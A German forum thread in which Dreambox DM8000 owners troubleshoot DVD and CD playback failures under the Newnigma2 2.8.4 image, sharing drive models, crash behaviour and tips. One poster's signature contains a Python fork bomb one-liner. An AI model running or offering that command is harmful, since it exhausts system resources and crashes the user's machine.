DVD's und CD's werden nicht abgespielt

• DVD's und CD's werden nicht abgespielt

Hallo.
      HW ist eine DM8000 mit DVD-LW und 1GB HDD. Problem: Bei mir werden ein großteil der CD's/DVD's nicht erkannt (Originale). Und zwar mindestens 80%. Der Rest nur schleppend langsam aber OK, ist halt ein Receiver und kein Player. Es gibt einige Threads hierzu, leider aber keine Lösung. Ich habe alle Updates online durchgeführt und bin seit 2.8.1 dabei. Auch eine neue installation der 2.8.4 hat nicht geholfen. Bei einem Freund der die gleiche Voraussetzungen hat (er hat ein anderes DVD-LW aber sonst gleiche HW) gibt es diese Probleme auch. Seitdem habe ich behelfsmaäßig ein Gemini-Image installiert, hier funktioniert die Wiedergabe der CD's/DVD's. Ist für mich aber nicht die optimale Lösung, mir gefällt das Newenigma2 um einiges besser. Läuft einfach runder. Möglicherweise kann mir da jemand helfen.

gruß c-r-u-s-h
    • Nunja wir beschäftigen uns mom mit dem oe 1.6 da funktioniert es zumindest hier uff der 800er mit dvd laufwerk.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kati910
      Nunja wir beschäftigen uns mom mit dem oe 1.6 da funktioniert es zumindest hier uff der 800er mit dvd laufwerk.

das ist ja mal ne Antwort die hilft! oe 1.6 ???????
    • Ich habe auch immer Probleme mit dem DVD Laufwerk!
      Bei gemini gibts da nie Probleme, aber das images gefällt mir nichts so gut.

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von alexander33 ()

• Ihr seit gut ich hab keine :glaskugel4:
      Woher soll man wissen was bei euch falsch läuft ihr gebt keine infos raus wie und was ihr installiert habt?
      Irgend welche multiboot sachen installiert BA,Meoboot usw?

Und zum oe 1.6 das ist die neue plattform für dreamboxen sie beinhaltet viele neue sachen z.b der neue kernel der richtig dampf macht.

P.S
      Bei gemini gibts da nie Probleme <- solche sätze könnt ihr euch sparen denn es hindert euch niemand das zu benutzen.
    • Original von alexander33
      Ich habe auch immer Probleme mit dem DVD Laufwerk!
      Bei gemini gibts da nie Probleme, aber das images gefällt mir nichts so gut.
      Diese Aussage kann ich NICHT bestätigen. Ich habe mit meinem DVD-Laufwerk (extern angeschlossen) immer wieder Probleme, dass Tracks nicht oder wenn dann nur nach sehr, sehr langer Zeit erkannt werden, vor allem bei Audio-CD's ... Aktuell verwende ich wieder Gemini4.7. Beim nächsten Release von NN2 werde ich aber wieder testen ...
      Gruss Grillehirni 8)

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Grillehirni ()

• Ich habe das 2.8.4 mit allen updates drauf und keine probleme mit dem abspielen von DVD's.
      In ganz seltenen fällen muss ich eine DVD zwei mal starten!
      Gruss
      DM8000SS+TT PVR DVD, DM500s, ipBox9000HD, 4/1 19e, 13e,5.0 e, 0.8 v Rotor 30 est -30vest,
      Samsung Smart TV UE40D8005
    • Original von mirg
      Ich habe das 2.8.4 mit allen updates drauf und keine probleme mit dem abspielen von DVD's.
      Gruss

thx
      So muss das sein wenn ich sage das geht glaubts mir eh keiner. :D
    • Original von kati910
      Original von mirg
      Ich habe das 2.8.4 mit allen updates drauf und keine probleme mit dem abspielen von DVD's.
      Gruss

thx

Ich glaube es dir. Aber es hilft mir nicht. Zu meiner HW hab ich alles geschrieben. Ist ne 8000 mit 1000GB HDD und internerm DVD-LW. Installiert ist die 2.8.4, und zwar mit allen Updates. Nichts zusätzlich........SOLO eben. Läuft aber trotzdem nicht, wie auch viele User hier bestätigen. Ignorieren hilft da wenig, so sehr ich auch die Mühen einer neuen Version schätze, so bedaure ich doch sehr dass nicht erst mal eine Version fertig gestellt wird. Allein in diesem Thread haben drei Personen probleme und einer nicht. Das sind 75%, da kann doch was nicht stimmen.

gruß c-r-u-s-h
    • @c-r-u-s-h
      Sag doch mal bitte was für ein DVD-LW du hast, und ob du es an der USB schnittstelle mit einem USB/eSATA konverter angeschlossen hast.
      Ich hatte probleme mit dem von DM gelieferten konverter!
      Gruss
      DM8000SS+TT PVR DVD, DM500s, ipBox9000HD, 4/1 19e, 13e,5.0 e, 0.8 v Rotor 30 est -30vest,
      Samsung Smart TV UE40D8005
    • Ich habe das Problem, dass auf meiner 8000er mit 2.8.4er Image im Flash manche Kauf DVDs nicht gehen. Irgendwie wird das Menü nicht geladen. Also die DVD wird als solche erkannt, ich werde gefragt, was ich machen soll, ich wähle die DVD aus zum schauen, das Fernsehprogramm wird beendet, der DVD-Player startet, aber es wird kein Film angezeigt angezeigt, nur die Bedienknöpfe vom DVD-Player sind zu sehen. Ein anderes Image wie Gemeni oderso habe ich nicht getestet, nur das 2.8.4 ein zweites mal frisch installiert (natürlich ohne den Barry).

Wäre toll wenn sich etwa ergeben würde. Kann auch gerne weitere Daten zur Verfügung stellen, wenn ihr mir erklär was ich machen soll.

Danke sagt die Mütze
    • Original von c-r-u-s-h
      Original von kati910
      Original von mirg
      Gruss

thx

Ich glaube es dir. Aber es hilft mir nicht. Zu meiner HW hab ich alles geschrieben. Ist ne 8000 mit 1000GB HDD und internerm DVD-LW. Installiert ist die 2.8.4, und zwar mit allen Updates. Nichts zusätzlich........SOLO eben. Läuft aber trotzdem nicht, wie auch viele User hier bestätigen. Ignorieren hilft da wenig, so sehr ich auch die Mühen einer neuen Version schätze, so bedaure ich doch sehr dass nicht erst mal eine Version fertig gestellt wird. Allein in diesem Thread haben drei Personen probleme und einer nicht. Das sind 75%, da kann doch was nicht stimmen.

gruß c-r-u-s-h

Die 75% gelten ja auch nur fuer Leute die sich hier melden! Bei mir funktioniert es im Unstable auch einwandfrei und hat auch im 2.8.4 Image einwandfrei funktioniert! Wenn wir den Fehler nicht nachstellen koennen, sind wir auf Infos angewiesen, wenn da nichts kommt kann man halt nicht helfen. Unsere Glaskugeln sind im Moment in Inspektion. :glaskugel2:
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Original von LoUiS

Die 75% gelten ja auch nur fuer Leute die sich hier melden! Bei mir funktioniert es im Unstable auch einwandfrei und hat auch im 2.8.4 Image einwandfrei funktioniert! Wenn wir den Fehler nicht nachstellen koennen, sind wir auf Infos angewiesen, wenn da nichts kommt kann man halt nicht helfen. Unsere Glaskugeln sind im Moment in Inspektion. :glaskugel2:

OK...mein LW ist ein SAMSUNG SN-S083C SLIM DVD BRENNER SATA angeschlossen an den Standard-Anschluß via Adapter (Original-Zubehör)

EDIT:

Habe gerade mal das neuste Image (newnigma2-snapshot-dm8000-20100407040523) installiert. Die DVD wird erkannt, ich kann auswählen "Film starten" die DVD läuft auch an, schaltet aber dann in den TV-Modus zurück und meldet dass ein Crashlog erstellt wurde. Leider ist das Crashlg-File leer, sonst weiter nichts........

EDIT 2: weitere Test haben ergeben dass es sehrwohl möglich ist einen Film zu starten. Wenn ich nämlich über die Kapitelanwahl des eingelegten Films gehe kann ich jedes Kapitel auswählen, der Film startet problemlos. Nur wenn ich über das Hauptmenü auf Film starten gehen funktioniert es nicht.

und nun...???

gruß c-r-u-s-h

Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von c-r-u-s-h ()

• Ja...so läufts oft. :rolleyes: Erst schön zurechtweisen wie der Neuling (ähhm Grünschnabel) seine Frage zu stellen hat ohne aber auf das Problem einzugehen, keinesfalls schon mal eine erste Beurteilung der Lage abgeben dafür aber ordentlich Infos einfordern um dann doch nicht helfen zu wollen oder zu können. Was soll ich tun.......mehr Infos hab ich nicht.

gruß c-r-u-s-h

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von c-r-u-s-h ()

• Original von c-r-u-s-h
      Ja...so läufts oft. :rolleyes: Erst schön zurechtweisen wie der Neuling (ähhm Grünschnabel) seine Frage zu stellen hat ohne aber auf das Problem einzugehen, keinesfalls schon mal eine erste Beurteilung der Lage abgeben dafür aber ordentlich Infos einfordern um dann doch nicht helfen zu wollen oder zu können. Was soll ich tun.......mehr Infos hab ich nicht.

gruß c-r-u-s-h

Mal fein den Ball flach halten! Es gibt auch Leute die im RL arbeiten muessen und nicht nur im Forum rumlungern und drauf warten das jemand auf Postings antwortet!
      Es scheint ja etwas mit Deinen DVD zu tun zu haben. Hast Du das mal mit mehreren unterschiedlichen DVD ausprobiert, oder immer mit ein und der selben? Ich habe meist selbst erstelle DVD (ohne Menue oder Kapitel) und einige Musik DVDs (mit Menue und Kapitel) Beides funktioniert hier und es stuerzt nichts ab.
      Wenn Deine Box abstuerzt und kein Bootlog geschrieben wird ist das erstmal ungewoehnlich. Hast Du nicht evtl. konfiguriert, das die Bootlogs per Mail automatisch verschickt werden und danach dann geloescht werden? Schau mal in der Konfiguration nach, was dort fuer die Bootlogs eingestellt ist.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Auch ich habe Probleme beim Abspielen von DVDs, d.h. nach dem Einlegen dauert es eine kleine Ewigkeit bis das Auswahlmenü kommt (Oft erscheint aber nicht einmal das Menü).
      Danach wähle ich aus, dass die DVD abgespielt werden soll. TV-Programm stoppt und der DVD-Player startet. DVD-Titelname wird angezeigt aber ansonsten passiert nix mehr. Ich sehe nur noch die Bedienleiste vom DVD-Player, vor-/zurückspulen oder Sonstiges bewirkt nichts.

Die Kauf-DVD die ich zum Testen als "Referenz" verwendet habe hat keine CSS-Verschlüsselung, sie funktionierte auch einwandfrei mit früheren Images.

Zur Zeit habe ich das aktuelle 2.8.4er Image ohne besondere Spielereien/Extras auf der Box.
      DVD-LW ist das Samsung SN-T083A. Es ist mit dem USB-SATA Adapter der bei der Box dabei war angeschlossen.
    • Original von VfBFan
      Auch ich habe Probleme beim Abspielen von DVDs, d.h. nach dem Einlegen dauert es eine kleine Ewigkeit bis das Auswahlmenü kommt (Oft erscheint aber nicht einmal das Menü).
      Danach wähle ich aus, dass die DVD abgespielt werden soll. TV-Programm stoppt und der DVD-Player startet. DVD-Titelname wird angezeigt aber ansonsten passiert nix mehr. Ich sehe nur noch die Bedienleiste vom DVD-Player, vor-/zurückspulen oder Sonstiges bewirkt nichts.

Die Kauf-DVD die ich zum Testen als "Referenz" verwendet habe hat keine CSS-Verschlüsselung, sie funktionierte auch einwandfrei mit früheren Images.

Zur Zeit habe ich das aktuelle 2.8.4er Image ohne besondere Spielereien/Extras auf der Box.
      DVD-LW ist das Samsung SN-T083A. Es ist mit dem USB-SATA Adapter der bei der Box dabei war angeschlossen.

mach mal die hinteren beiden Befestigungsschrauben rauss und versuch es nochmal.
      gruss mucky
    • Original von LoUiS
      Mal fein den Ball flach halten! Es gibt auch Leute die im RL arbeiten muessen und nicht nur im Forum rumlungern und drauf warten das jemand auf Postings antwortet!
      Es scheint ja etwas mit Deinen DVD zu tun zu haben. Hast Du das mal mit mehreren unterschiedlichen DVD ausprobiert, oder immer mit ein und der selben? Ich habe meist selbst erstelle DVD (ohne Menue oder Kapitel) und einige Musik DVDs (mit Menue und Kapitel) Beides funktioniert hier und es stuerzt nichts ab.
      Wenn Deine Box abstuerzt und kein Bootlog geschrieben wird ist das erstmal ungewoehnlich. Hast Du nicht evtl. konfiguriert, das die Bootlogs per Mail automatisch verschickt werden und danach dann geloescht werden? Schau mal in der Konfiguration nach, was dort fuer die Bootlogs eingestellt ist.

Auch ich arbeite ganztags......keine Sorge, dein Ton ist aber unter meinem Niveau deshalb geh ich da mal nicht drauf ein. Bin keine 13 mehr!

Ja, ich habe verschiedene DVD's ausprobiert. Ich habe nichts umkonfiguriert. Image neu aufgespielt und als erste das abspielen der DVD's getestet. Crashlogs werden nicht versendet. Es zeigt an das ein Crashlog gefunden wurde und fragt ob er es versenden soll. Ich sage nein, schaue es mir an und es steht nichts drin.

Zum DV-LW. Mit anderen Images klappt es ja, ich möchte aber unbedingt das Newenigma Image behalten weil es für mich am besten mit der Box harmoniert.

Original von mucky
      mach mal die hinteren beiden Befestigungsschrauben rauss und versuch es nochmal.

hab ich auch mal probiert da ich das gleiche LW habe, leider ohne Erfolg.

c-r-u-s-h

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von c-r-u-s-h ()